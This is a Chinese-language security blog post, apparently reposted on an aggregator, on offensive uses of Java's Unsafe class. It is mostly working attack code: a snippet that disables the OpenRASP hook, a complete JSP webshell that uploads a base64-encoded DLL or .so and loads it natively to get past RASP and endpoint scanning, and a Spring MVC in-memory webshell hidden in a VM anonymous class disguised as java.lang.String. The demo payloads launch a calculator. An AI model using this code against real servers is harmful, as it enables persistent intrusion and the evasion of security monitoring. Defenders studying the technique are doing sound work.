Java中的Unsafe在安全领域的一些应用总结和复现
Python微信訂餐小程序課程視頻
https://edu.csdn.net/course/detail/36074
Python實戰量化交易理財系統
https://edu.csdn.net/course/detail/35475
目錄* 0 前言
- 1 基本使用
- 1.1 內存級別修改值
- 1.2 創建對象
- 1.3 創建VM Anonymous Class
- 2 利用姿勢
- 2.1 修改值以關閉RASP等防御措施
- 2.2 創建NativeLibrary對象實現webshell
- 2.3 匿名的內存馬
- 2.4 shellcode和instrumentation對象構建
- 3 總結
- 參考:
0 前言
unsafe里面有很多好用的方法,比如allocateInstance可以直接創建實例對象,defineAnonymousClass可以創建一個VM匿名類(VM Anonymous Class),以及直接從內存級別修改對象的值。
1 基本使用
首先是獲取Unsafe對象,一般使用反射獲取Unsafe,否則會被Java安全機制攔截,代碼如下
public static Unsafe getUnsafe() throws Exception{Class aClass = Class.forName("sun.misc.Unsafe");Constructor declaredConstructor = aClass.getDeclaredConstructor();declaredConstructor.setAccessible(true);Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();return unsafe;}1.1 內存級別修改值
這里首先要提到的是,在jvm中,對實例的Field進行了有規律的存儲,具體可見JVM相關知識,而通過一個偏移量可以從內存中找到相應的Field值。在Unsafe中獲取偏移量的方法是staticFieldOffset(Field var1)和objectFieldOffset(Field var1)這兩個方法,輸入一個Field對象后,會返回該Field在其相應的類中的內存偏移量是多少。通過獲得的偏移量可進一步調用putInt、putLong、putObject等方法對實例的field進行修改。
例如:
package com.bitterz.unsafe;import sun.misc.Unsafe; import java.lang.reflect.Constructor; import java.lang.reflect.Field;public class UnsafeTest {private int a = 1;private String string = "whoami";public UnsafeTest(){}public void test(){ }public static void main(String[] args) throws Exception {Unsafe unsafe = getUnsafe();UnsafeTest unsafeTest = new UnsafeTest();// 修改intField f = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("a");long l = unsafe.objectFieldOffset(f);unsafe.putInt(unsafeTest, l, 9999);System.out.println(unsafeTest.a);// 修改stringField f2 = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("string");long l2 = unsafe.objectFieldOffset(f2);unsafe.putObject(unsafeTest, l2, "bitterz");System.out.println(unsafeTest.string);}public static Unsafe getUnsafe() throws Exception{Class aClass = Class.forName("sun.misc.Unsafe");Constructor declaredConstructor = aClass.getDeclaredConstructor();declaredConstructor.setAccessible(true);Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();return unsafe;} }其輸出結果為
但對final和static修飾的field這種修改方法無效。另外還可以通過偏移量使用getInt()、getObject()等方法獲取實例的field值,這種方法也可以作為反射被限制時的一種繞過。
1.2 創建對象
Unsafe中有個allocateInstance方法,可以無視構造方法,直接利用類對象構建實例,這種方法往往能夠減少反射創建實例時可能遇到的各種阻礙,比如類的依賴關系。
比如前面創建Unsafe時使用了反射,不能直接進行創建,那么可以使用unsafe進行創建(只是為了演示。。)
1.3 創建VM Anonymous Class
VM Anonymous Class并不等同于匿名類,這種類具有以下幾個特點(摘自https://paper.seebug.org/1785):
1、class名可以是已存在的class的名字,比如java.lang.File,即使如此也不會發生任何問題,java的動態編譯特性將會在內存中生成名如 java.lang.File/13063602@38ed5306的class。 ---將會使類名極具欺騙性 2、該class的classloader為null。 ---在java中classloader為null的為來自BootstrapClassLoader的class,往往會被認定為jdk自帶class 3、在JVM中存在大量動態編譯產生的class(多為lamada表達式生成),這種class均不會落盤,所以不落盤并不會屬于異常特征。 4、無法通過Class.forName()獲取到該class的相關內容。 ---嚴重影響通過反射排查該類安全性的檢測工具 5、在部分jdk版本中,VM Anonymous Class甚至無法進行restransform。 ---這也就意味著我們無法通過attach API去修復這個惡意類 6、該class在transform中的className將會是它的模板類名。 ---這將會對那些通過attach方式檢測內存馬的工具造成極大的誤導性使用方法如下
defineAnonymousClass方法的第一個參數隨便傳入一個類對象即可,第二個參數需要傳入一個類的字節碼,這里使用javassist簡單一點。第三個參數設置為null即可。
執行后得到一個類對象,通過newInstance獲取實例,再調用了匿名類的toString方法,彈個計算器。而后輸出匿名類的類名和Unsafe的類名進行對比,可見,用defineAnonymousClass創建的類名后面,會有"/xxxxxxxx",這里也算一個特征,但通過Class.forName是無法獲取到這個類的,所以下面報錯了。
用attach的方式,看看對該類的檢測,之前寫過rasp相關的筆記,所以直接拿過來用
transform里面拿到到該類后,直接報錯了,看了一下報錯日志,實際上就是在transform中返回字節碼時出問題了,因為前面也說了在部分jdk中,VM AnonymousClass是不能被retransform的,我這里用的是jdk1.8u40。但是直接結束程序有點不太好,例如插入內存馬后,目標使用attach機制來掃描jvm中加載的類,此時直接導致Web程序崩潰,業務不得提刀來殺安全:) 這個點用于內存馬可能要慎重一下。
2 利用姿勢
2.1 修改值以關閉RASP等防御措施
前面提到了,通過Unsafe可以直接修改值,因此在遇到目標有RASP得情況下,可以考慮修改RASP的開關;
try {Class clazz = Class.forName("com.baidu.openrasp.HookHandler");Unsafe unsafe = getUnsafe();InputStream inputStream = clazz.getResourceAsStream(clazz.getSimpleName() + ".class");byte[] data = new byte[inputStream.available()];inputStream.read(data);Class anonymousClass = unsafe.defineAnonymousClass(clazz, data, null);Field field = anonymousClass.getDeclaredField("enableHook");unsafe.putObject(clazz, unsafe.staticFieldOffset(field), new AtomicBoolean(false));} catch (Exception e) {}或者使用rebeyond師傅提到的方法,手動構建insturmentation對象,然后對執行命令的類去掉RASP插樁代碼。
2.2 創建NativeLibrary對象實現webshell
這里的思路來自于SummerSec師傅的文章,通過java.lang.ClassLoader$NativeLibrary#load(String, Boolean)方法,加載一個dll文件,而dll文件中可以實現各種攻擊手段,例如上傳了一個jsp文件,只用于加載dll,而不同的dll實現了內網穿透、反彈Shell、木馬和執行命令等功能,攻擊時上傳對應dll文件即可。
借鑒https://github.com/SummerSec/Loader/blob/main/AddDllDemo.jsp ,又稍微改了一下代碼,把上傳文件和加載dll融合到了一個jsp里面
<%@page pageEncoding="utf-8"%> "file" id="fielinput" /> ![]()"txshow" style="width:100px;height:100px;"/> 解析之后的base64數據: "data">"utf-8">"http://127.0.0.1:8080/test/AddDllDemo.jsp" method="POST">"text" style="width:1300px;height:100px;font-size:30px" name="p"/>"submit" value="提交"/>"text/javascript"</span>><span class="hljs-type">var</span> <span class="hljs-variable">input</span> <span class="hljs-operator">=</span> document.getElementById(<span class="hljs-string">"fielinput"</span>); input.addEventListener(<span class="hljs-string">'change'</span>, readFile, <span class="hljs-literal">false</span>); function <span class="hljs-title function\_">readFile</span><span class="hljs-params">()</span> {<span class="hljs-type">var</span> <span class="hljs-variable">file</span> <span class="hljs-operator">=</span> <span class="hljs-built\_in">this</span>.files[<span class="hljs-number">0</span>];<span class="hljs-type">var</span> <span class="hljs-variable">reader</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class\_">FileReader</span>(); <span class="hljs-comment">// 返回一個新的FileReader函數</span>reader.readAsDataURL(file);reader.onload = function (e) {txshow.src = <span class="hljs-built\_in">this</span>.result;document.getElementById(<span class="hljs-string">"data"</span>).innerText=<span class="hljs-built\_in">this</span>.result.substring(<span class="hljs-built\_in">this</span>.result.indexOf(<span class="hljs-string">','</span>)+<span class="hljs-number">1</span>);} } ><% if(request.getMethod().equals("GET")){}else{String p = request.getParameter("p");String t = request.getServletContext().getRealPath("/");java.io.PrintWriter outp = response.getWriter();outp.println("WebRootPath:");outp.println(t);t = request.getServletPath();outp.println("ServletPath:");outp.println(t);t = (new java.io.File(".").getAbsolutePath());outp.println("WebServerPath:");outp.println(t);java.util.Random random = new java.util.Random(System.currentTimeMillis());outp.println("if Dynamic Link Library will be auto load in uploading !!!");t = System.getProperty("os.name").toLowerCase();if (t.contains("windows")) {t = "C:/Windows/temp/dm" + random.nextInt(10000000) + "1.dll";}else {t = "/tmp/dm" + random.nextInt(10000000) + "1.so";}if (p != null) {try {java.io.FileOutputStream fos = new java.io.FileOutputStream(new java.io.File(t));fos.write(D(p));fos.close();N(t);outp.println("Dynamic Link Library is uploaded, and the path is: " + t);outp.println("load uploaded success !!!");} catch (Exception e) {outp.println(e.getMessage());}}outp.flush();outp.close(); }%><%!private void N(String t) throws Exception {Object o;Class a = Class.forName("java.lang.ClassLoader$NativeLibrary");try {java.lang.reflect.Constructor c = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class});c.setAccessible(true);o = c.newInstance(Class.class,t,true);}catch (Exception e){Class u = Class.forName("sun.misc.Unsafe");java.lang.reflect.Constructor c = u.getDeclaredConstructor();c.setAccessible(true);sun.misc.Unsafe un = (sun.misc.Unsafe)c.newInstance();o = un.allocateInstance(a);}java.lang.reflect.Method method = o.getClass().getDeclaredMethod("load", String.class, boolean.class);method.setAccessible(true);method.invoke(o, t, false);}private byte[] D(String p) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[])(clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), p));} catch (Exception var5) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[])(decoder.getClass().getMethod("decode", String.class).invoke(decoder, p));}} %>瀏覽器訪問AddDllDemo.jsp后,選擇dll文件,并復制base64值到文本框中,點擊提交
成功彈出計算器
使用Unsafe去創建NativeLibrary的有點在于可以減少在java層面的調用,直接一個load方法就能實現native層面的代碼執行,可以繞過RASP或終端軟件對webshell的查殺,以及java層面執行命令時被攔截的可能。
目前這種做法有個缺點在于DLL文件必須落地,顯然落地就有可能被文件監控察覺到。另外實現這種做法的還有ClassLoader#loadLibrary和ClassLoader#loadLibrary0,利用反射即可實現不再贅述。期待大師傅們搞出無文件落地的姿勢!
2.3 匿名的內存馬
前面提到了使用Unsafe.defineAnonymousClass方法可以創建一個VM Anonymous Class,基于其各種特點,可以讓內存馬隱藏的更深
在springmvc中,插入servlet內存馬時,只需要傳入方法名和惡意類的實例對象,剛好適合這種Anonymous Class,pom.xml設置如下
<dependency><groupId>org.springframeworkgroupId><artifactId>spring-webartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.springframeworkgroupId><artifactId>spring-webmvcartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.springframeworkgroupId><artifactId>spring-contextartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.springframeworkgroupId><artifactId>spring-testartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.springframeworkgroupId><artifactId>spring-jdbcartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.javassistgroupId><artifactId>javassistartifactId><version>3.19.0-GAversion> dependency>在spring_mvc中寫個controller來注入,示例代碼如下:
@ResponseBody @RequestMapping(value = "/index", method = RequestMethod.GET) public String index(HttpServletRequest request, HttpServletResponse response) throws Exception {// 準備unsafe和匿名類Class aClass = Class.forName("sun.misc.Unsafe");Constructor declaredConstructor = aClass.getDeclaredConstructor();declaredConstructor.setAccessible(true);Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();ClassPool classPool = ClassPool.getDefault();CtClass ctClass = classPool.makeClass("java.lang.String");CtMethod toString = CtMethod.make("public String toString(){java.lang.Runtime.getRuntime().exec(\"calc\");return null;}", ctClass);toString.setName("toString");ctClass.addMethod(toString);byte[] bytes = ctClass.toBytecode();Class anonymousClass = unsafe.defineAnonymousClass(File.class, bytes, null);// 插入內存馬WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);// 1. 從當前上下文環境中獲得 RequestMappingHandlerMapping 的實例 beanRequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);AbstractHandlerMethodMapping abstractHandlerMethodMapping = context.getBean(AbstractHandlerMethodMapping.class);Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");method.setAccessible(true);Object mappingRegistry = (Object) method.invoke(abstractHandlerMethodMapping);Field field = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry").getDeclaredField("urlLookup");field.setAccessible(true);Map urlLookup = (Map) field.get(mappingRegistry);Iterator urlIterator = urlLookup.keySet().iterator();String injectUrlPath = "/malicious"; // 插入的urlwhile (urlIterator.hasNext()){String urlPath = (String) urlIterator.next();if (injectUrlPath.equals(urlPath)){System.out.println("URL已存在");return "exist";}}// 2. 通過反射獲得自定義 controller 中唯一的 Method 對象Method method2 = anonymousClass.getDeclaredMethod("toString");// 3. 定義訪問 controller 的 URL 地址PatternsRequestCondition url = new PatternsRequestCondition(injectUrlPath);// 4. 定義允許訪問 controller 的 HTTP 方法(GET/POST)RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();// 5. 在內存中動態注冊 controllerRequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);// InjectAnonymousClass InjectAnonymousClass = new InjectAnonymousClass("aaa");Object o = anonymousClass.newInstance();mappingHandlerMapping.registerMapping(info, o, method2);return "injected!"; // 這里根據注解會自動返回index.html }啟動項目,然后訪問該controller對應的url,結果如下
注入成功,訪問/malicious
由于惡意代碼里面只寫了彈計算器,并沒有寫返回語句,所以tomcat尋找malicious.jsp會返回404。調試模式下看一下對該url的描述
只有在beanType處顯示類名為java.lang.String/179284069,其它地方都顯示為java.lang.String。匿名類的類名又可以隨意設置,所以稍加修飾即可以假亂真,比如先拿到org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry,遍歷其中,隨便找一個controller的類名和方法名,然后回顯一下,再給惡意類寫個一樣的package和方法名,url則根據Web應用的規律自己編一個,這樣的話,還是能夠欺騙到根據package和方法名判斷的檢測方法,另外VM Anonymous Class沒辦法獲取到字節碼,所以也能逃過一劫。
2.4 shellcode和instrumentation對象構建
Unsafe類還能對內存進行操作,在rebeyond師傅的文章-java內存攻擊技術漫談中有大量應用,最終可以通過內存級別的操作,直接構建instrumentation對象進而修改jvm中的java代碼;或者執行shellcode,從而繞過RASP實現命令執行、文件讀寫等操作。
3 總結
Unsafe在java攻擊層面屬實非常有用,而其正常使用也非常廣泛,例如gson反序列化時,直接使用allocateInstance創建對象,無視構造函數的復雜。Unsafe還有很多其它功能,不夠安全人員可能用的比較少,我也借用一下這張傳的最廣泛的圖:)
參考:
https://paper.seebug.org/1785
https://tttang.com/archive/1436/
https://blog.csdn.net/rebeyond/p/15162264.html
總結
以上是生活随笔為你收集整理的Java中的Unsafe在安全领域的一些应用总结和复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Linux服务器上监控网络带宽与监控性能
- 下一篇: 模板-1-模板类的特化